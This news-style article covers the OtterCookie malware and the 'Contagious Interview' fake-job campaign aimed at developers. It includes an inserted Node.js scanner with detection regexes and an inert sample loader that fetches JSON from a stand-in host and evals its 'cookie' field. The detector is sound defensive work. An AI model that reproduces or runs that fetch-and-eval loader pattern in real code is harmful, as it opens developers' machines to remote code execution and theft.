2024-12-26
Beware Developers: New Malware Targets You in Fake Job Offers
North Korean threat actors are on the prowl again, this time using a new malware called OtterCookie to target software developers through a campaign known as Contagious Interview. This campaign has been ongoing since at least December 2022 and leverages fake job offers to trick developers into downloading malware.
Contagious Interview Evolves with New Malware
Researchers at Palo Alto Networks first discovered the Contagious Interview campaign in December 2022. The campaign used fake job offers to deliver malware like BeaverTail and InvisibleFerret. Now, a new report from NTT Security Japan reveals that the attackers have added a new weapon to their arsenal: OtterCookie.
OtterCookie first appeared in September 2024, with a new variant emerging in November. The malware is delivered through a loader that fetches JSON data and executes a specific property (“cookie”) as JavaScript code.
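The loader shape described above (remote JSON whose "cookie" property is executed as JavaScript) can be triaged statically before a test project is installed or run. The Node.js script below is an added example, not code from the NTT Security report or from the malware; the function names, sample files and example.invalid URLs are constructed for illustration, and the regexes are heuristics rather than published signatures.

```javascript
// Heuristic triage: flag source that fetches remote data AND passes a
// non-literal value to a dynamic-execution sink (eval, Function, vm.run*).
const FETCH_RE = /\b(?:fetch|axios(?:\.\w+)?|https?\.(?:get|request)|got)\s*\(/;
const SINK_RE = /\b(eval|Function|runInNewContext|runInThisContext)\s*\(([^)]*)\)/g;
const LITERAL_RE = /^(["'])(?:\\.|(?!\1).)*\1$/;

function scanSource(file, src) {
  const sinks = [];
  for (const m of src.matchAll(SINK_RE)) {
    const args = m[2].split(",").map((a) => a.trim()).filter(Boolean);
    const dynamic = args.filter((a) => !LITERAL_RE.test(a));
    if (dynamic.length === 0) continue; // constant code string: not this pattern
    sinks.push({
      sink: m[1],
      line: src.slice(0, m.index).split("\n").length,
      args: dynamic,
      // The report names the JSON property "cookie": match .cookie or ["cookie"].
      namedProperty: dynamic.some((a) => /\.cookie\b|\[\s*["']cookie["']\s*\]/.test(a)),
    });
  }
  const fetches = FETCH_RE.test(src);
  const verdict = sinks.length === 0 ? "clean" : fetches ? "high" : "review";
  return { file, fetches, sinks, verdict };
}

// Constructed samples: inert strings, never executed by this script.
const SAMPLES = {
  "loader-like.js": [
    'const axios = require("axios");',
    'axios.get("https://api.example.invalid/config").then((res) => {',
    "  eval(res.data.cookie);",
    "});",
  ].join("\n"),
  "benign-client.js": [
    'const res = await fetch("https://api.example.invalid/v1/jobs");',
    "const jobs = await res.json();",
    "console.log(jobs.length);",
  ].join("\n"),
  "local-eval.js": "const expr = process.argv[2];\nconsole.log(eval(expr));",
};

function scanAll(samples) {
  return Object.entries(samples).map(([file, src]) => scanSource(file, src));
}

for (const r of scanAll(SAMPLES)) console.log(r.file, r.verdict, JSON.stringify(r.sinks));
```

A "high" verdict means the file deserves manual review before anything is installed or run; it does not identify the code as OtterCookie, and obfuscated loaders will evade regex checks like these.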
Infection Chain and Capabilities
Similar to previous iterations of the Contagious Interview campaign, OtterCookie targets software developers through infected Node.js projects, npm packages downloaded from repositories like GitHub or Bitbucket, and even Qt or Electron applications.
Once installed, OtterCookie establishes secure communication with its command and control (C2) server using Socket.IO and awaits instructions. The researchers observed commands designed to steal valuable information from the target device, including cryptocurrency wallet keys, documents, images, and clipboard data.
The September variant of OtterCookie included built-in functionality to search for Ethereum private keys using regular expressions. This functionality was replaced with remote shell commands in the November variant, indicating the attackers’ evolving tactics.
What Undercode Says: Analyzing the Threat
The emergence of OtterCookie and the diversification of infection methods employed in the Contagious Interview campaign highlight several critical points for software developers:
Increased Threat Landscape: This campaign underscores the growing sophistication of cyberattacks targeting developers. Developers are increasingly seen as a gateway to sensitive information and systems.
Social Engineering Tactics: The use of fake job offers demonstrates the effectiveness of social engineering tactics in luring developers into compromising their machines.
Code Security Awareness: Developers need to be vigilant about the code they download and run, especially from untrusted sources. Employers should also avoid requesting coding tests that involve running code on personal devices.
Multi-Layered Defense: A comprehensive security strategy that includes code scanning, endpoint protection, and security awareness training is essential to mitigate these evolving threats.
Conclusion
The Contagious Interview campaign serves as a stark reminder of the constant need for vigilance among software developers. By staying informed about the latest threats, adopting secure coding practices, and remaining cautious of unsolicited job offers, developers can help protect themselves and their organizations from these sophisticated attacks.
References:
Reported By: Bleepingcomputer.com